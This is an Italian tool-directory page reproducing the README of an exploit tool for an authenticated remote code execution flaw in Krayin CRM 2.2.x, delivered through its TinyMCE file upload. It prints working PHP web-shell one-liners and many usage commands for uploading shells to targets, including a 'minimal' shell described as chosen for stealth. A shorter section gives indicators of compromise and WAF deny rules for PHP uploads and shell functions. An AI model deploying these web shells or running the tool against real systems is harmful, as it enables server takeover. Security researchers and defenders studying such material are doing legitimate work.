Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — Exploit CVE-2026-38526 per Krayin CRM v2.2.x - RCE autenticato tramite bypass del caricamento file di TinyMCE. Include shell interattiva, payload multi-tipo, generazione automatica di shell e verifica. Autore: Sudeepa Wanigarathna. Solo per test autorizzati. | Kitploit
Strumenti/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingGenerazione di Shellcode
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

KrayinCRM-RCE-Exploit-CVE-2026-38526

Exploit CVE-2026-38526 per Krayin CRM v2.2.x - RCE autenticato tramite bypass del caricamento file di TinyMCE. Include shell interattiva, payload multi-tipo, generazione automatica di shell e verifica. Autore: Sudeepa Wanigarathna. Solo per test autorizzati.

Vedi Repository
371 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔓 Krayin CRM v2.2.x - Exploit di Esecuzione Remota di Codice Autenticata

License: MIT CVE-2026-38526

⚠️ SOLO PER TEST DI SICUREZZA AUTORIZZATI - L'uso non autorizzato è illegale e non etico.

📋 Panoramica

Questo strumento di exploit dimostra una vulnerabilità critica di esecuzione remota di codice autenticata (RCE) scoperta in Krayin CRM versione 2.2.x. La vulnerabilità risiede nella funzionalità di caricamento file di TinyMCE, che consente agli amministratori autenticati di caricare ed eseguire codice PHP arbitrario sul server.

ProprietàValore
ID CVECVE-2026-38526
Software AffettoKrayin CRM v2.2.x
Tipo di VulnerabilitàEsecuzione Remota di Codice Autenticata (RCE)
Autenticazione RichiestaSì (accesso a livello Amministratore)
ImpattoCompromissione completa del sistema
Punteggio CVSS8.8 (Alto)

🚨 Dettagli della Vulnerabilità

La vulnerabilità deriva da una validazione insufficiente del tipo di file nell'endpoint di caricamento file di TinyMCE (/admin/tinymce/upload). Un amministratore autenticato può:

  • Caricare un file PHP camuffato con un tipo MIME di immagine.
  • Il file viene memorizzato in una posizione accessibile dal web.
  • L'attaccante può quindi eseguire codice PHP arbitrario sul server.

Versioni Affette

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • Tutte le versioni 2.2.x precedenti al rilascio della patch

✨ Caratteristiche

  • Tipi di Shell Multipli: Base, Avanzata, Minima, File Manager e Personalizzata.
  • Shell Interattiva: Interfaccia simile a un terminale con cronologia dei comandi.
  • Caricamento File: Carica file aggiuntivi tramite la shell.
  • Estrazione Token CSRF: Gestione automatica della protezione CSRF.
  • Supporto Proxy: Instradamento del traffico attraverso proxy HTTP/HTTPS.
  • Formati di Output Flessibili: Testo, JSON o modalità Silenziosa.
  • Logica di Riprova: Riprova automatica in caso di fallimenti di connessione.
  • Intestazioni Personalizzate: Supporto per intestazioni HTTP personalizzate.
  • Modalità Verbosa: Output di debug dettagliato.
  • Supporto SSL: Verifica facoltativa del certificato SSL.

📦 Installazione

Requisiti

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

Installazione Rapida

root@kitploit:~
git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

File dei Requisiti (requirements.txt)

root@kitploit:~
httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 Utilizzo

Sintassi di Base del Comando

root@kitploit:~
python3 exploit.py -t <URL_DESTINAZIONE> -u <NOME_UTENTE> -p <PASSWORD> [OPZIONI]

Parametri Richiesti

ParametroDescrizione
-t, --targetURL di destinazione (es. http://192.168.1.100)
-u, --usernameNome utente o email dell'amministratore
-p, --passwordPassword dell'amministratore

Esempi di Utilizzo Comuni

root@kitploit:~
# Sfruttamento base con shell generata
python3 exploit.py -t http://target.com -u [email protected] -p password

# Caricamento di un file shell PHP personalizzato
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generazione di shell avanzata con modalità interattiva
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generazione di un file shell senza sfruttamento
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Utilizzo con proxy per test/debug
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# Output JSON per automazione
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Modalità verbosa con timeout personalizzato
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# User-Agent e intestazioni personalizzate
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 Tipi di Shell

  1. Shell Base (basic) Esecuzione semplice di comandi con la funzione system().

    root@kitploit:~
    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. Shell Avanzata (advanced) Shell ricca di funzionalità con:

    • Metodi multipli di esecuzione comandi
    • Bella interfaccia web simile a un terminale
    • Supporto cronologia comandi
    • Visualizzazione dell'utente corrente e nome host
  3. Shell Minima (minimal) Impronta minima per la furtività.

    root@kitploit:~
    <?php system($_GET["cmd"]); ?>
    
  4. File Manager (file_manager) Interfaccia completa per la gestione dei file:

    • Caricamento file
    • Eliminazione file
    • Creazione directory
    • Navigazione
    • Visualizzatore permessi file
  5. Shell Personalizzata (custom) Usa il tuo file shell PHP con il parametro -f.

📝 Formati di Output

Formato Testo (Default)

Output colorato leggibile dall'uomo, adatto per uso interattivo.

Formato JSON (-o json)

Formato leggibile dalla macchina per automazione e integrazione.

root@kitploit:~
{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

Formato Silenzioso (-q, --quiet)

Nessun output tranne che per gli errori. Utile per elaborazione batch.

⚙️ Opzioni Avanzate

OpzioneDescrizioneDefault
--timeoutTimeout della richiesta in secondi30
--retryNumero di tentativi di riprova3
--retry-delayRitardo tra i tentativi in secondi2
--user-agentStringa User-Agent personalizzataUA browser default
--headerIntestazioni HTTP personalizzate (Key: Value)Nessuno
--verify-sslVerifica certificati SSLFalse
--proxyURL proxy HTTP/HTTPSNessuno
-v, --verboseAbilita output di debugFalse
-q, --quietSopprime tutto l'outputFalse

Esempio di Intestazioni Personalizzate

root@kitploit:~
--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 Rilevamento e Prevenzione

Segni di Compromissione (IoC)

  • File da Monitorare:

    • File PHP insoliti in public/storage/upload/
    • File con doppia estensione (es. image.php.jpg)
    • Nuovi file con nomi sospetti
  • Log da Controllare:

    • Richieste POST a /admin/tinymce/upload
    • Orari di accesso amministratore insoliti
    • Tentativi di autenticazione falliti
  • Indicatori di Sistema:

    • Processi in esecuzione inaspettati
    • Nuovi cron job
    • File di sistema modificati

Misure di Prevenzione

  • Azioni Immediatamente:

    root@kitploit:~
    # Aggiornare alla versione patchata
    composer update krayin/crm
    
    # Disabilitare temporaneamente l'accesso amministratore
    # Rimuovere account amministratore non necessari
    # Cambiare tutte le password amministratore
    
  • Indurimento del Caricamento File:

    root@kitploit:~
    // Validare il tipo di file in base al contenuto, non solo all'estensione
    // Implementare una politica di sicurezza del contenuto
    // Usare un Web Application Firewall (WAF)
    // Abilitare la scansione dei file caricati
    
  • Controllo degli Accessi:

    root@kitploit:~
    # Limitare gli IP amministratore in .htaccess
    # Implementare MFA per account amministratore
    # Audit regolare degli amministratori
    # Politiche di timeout delle sessioni
    
  • Regole WAF (ModSecurity):

    root@kitploit:~
    # Bloccare caricamenti di file sospetti
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'Caricamento file PHP bloccato'"
    
    # Bloccare web shell
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Comando shell bloccato'"
    

🛡️ Divulgazione Responsabile

Questa vulnerabilità è stata scoperta attraverso una ricerca di sicurezza responsabile. Il processo di divulgazione ha seguito questi passaggi:

  • Scoperta: Vulnerabilità identificata durante una valutazione di sicurezza.
  • Verifica: Confermata la vulnerabilità in Krayin CRM 2.2.x.
  • Segnalazione: Notificata privatamente agli sviluppatori di Krayin CRM.
  • Coordinamento: Lavorato con il team per sviluppare una correzione.
  • Patch: In attesa del rilascio ufficiale della patch.
  • Divulgazione: Divulgazione pubblica dopo la disponibilità della patch.

Cronologia

  • Scoperta: TBD
  • Segnalata: TBD
  • Patch Rilasciata: TBD
  • Divulgazione Pubblica: TBD

📜 Disclaimer

root@kitploit:~
QUESTO SOFTWARE È FORNITO "COSÌ COM'È" E QUALSIASI GARANZIA ESPLICITA O IMPLICITA,
INCLUSIVE, MA NON LIMITATE A, LE GARANZIE IMPLICITE DI COMMERCIABILITÀ
E IDONEITÀ PER UNO SCOPO PARTICOLARE SONO DECLINATE. IN NESSUN CASO
L'AUTORE SARÀ RESPONSABILE PER DANNI DIRETTI, INDIRETTI, INCIDENTALI,
SPECIALI, ESEMPLARI O CONSEQUENZIALI DERIVANTI IN QUALSIASI MODO DALL'USO
DI QUESTO SOFTWARE.

L'USO DI QUESTO STRUMENTO PER SCOPI DIVERSI DA TEST DI SICUREZZA AUTORIZZATI
È ILLEGALE E NON ETICO. L'AUTORE NON SI ASSUME ALCUNA RESPONSABILITÀ PER
L'USO NON AUTORIZZATO O EVENTUALI DANNI CAUSATI DA QUESTO STRUMENTO.

🔧 Risoluzione dei Problemi

Problemi Comuni

  • Problema: Autenticazione fallita

    • Soluzione: Verificare le credenziali, controllare che il percorso di login amministratore sia /admin/login
    • Controllo: Assicurarsi che l'estrazione del token CSRF funzioni correttamente
  • Problema: Caricamento file fallito

    • Soluzione: Controllare i permessi dei file, verificare che l'endpoint di caricamento esista
    • Controllo: Assicurarsi che il target utilizzi l'editor TinyMCE
  • Problema: La shell non esegue i comandi

    • Soluzione: Verificare che le funzioni PHP non siano disabilitate in php.ini
    • Controllo: Testare con un comando semplice come echo test
  • Problema: Errori del certificato SSL

    • Soluzione: Usare il flag --verify-ssl o disabilitare la verifica
    • Nota: I certificati autofirmati causeranno errori senza una corretta verifica

Modalità Debug

root@kitploit:~
# Abilitare il logging verbose
python3 exploit.py -t http://target.com -u admin -p pass -v

# Con proxy (Burp Suite, ecc.)
python3 exploit.py -t http://target.com -u admin -p pass --proxy http://127.0.0.1:8080

🤝 Contribuire

I contributi sono benvenuti! Assicurati che:

  • Tutto il codice sia adeguatamente testato.
  • La documentazione sia aggiornata.
  • Le linee guida etiche siano seguite.
  • La ricerca sulle vulnerabilità sia condotta in modo responsabile.

📚 Riferimenti

  • Sito Ufficiale Krayin CRM
  • CVE-2026-38526
  • OWASP Esecuzione Remota di Codice
  • Migliori Pratiche di Sicurezza PHP

⭐ Supporto

Se trovi utile questo strumento per la ricerca sulla sicurezza, considera:

  • ⭐ Mettere una stella al repository
  • 🔔 Seguire per aggiornamenti
  • 📢 Condividere con altri ricercatori di sicurezza

Creato con ❤️ per la Ricerca sulla Sicurezza

Ricorda: Da grandi poteri derivano grandi responsabilità. Usa questa conoscenza saggiamente!

📊 Scheda di Riferimento Rapido dei Comandi

root@kitploit:~
# Riferimento rapido
python3 exploit.py -t URL -u USER -p PASS [OPZIONI]

# Opzioni:
#   -f FILE           Carica shell personalizzata
#   --shell-type TYPE Base|Avanzata|Minima|File_Manager|Personalizzata
#   -i                Modalità interattiva
#   --proxy URL       Proxy HTTP
#   -v                Output verbose
#   -o json           Output JSON
#   --generate-only   Crea shell senza sfruttamento
#   --timeout SEC     Timeout richiesta
#   --retry N         Numero di tentativi
#   --user-agent UA   User-Agent personalizzato
#   --header "K: V"   Intestazioni personalizzate
#   --verify-ssl      Verifica certificati SSL
#   -q, --quiet       Sopprime output

🔒 Ricorda: Ottieni sempre un'autorizzazione scritta prima di testare qualsiasi sistema!

Scarica lo strumento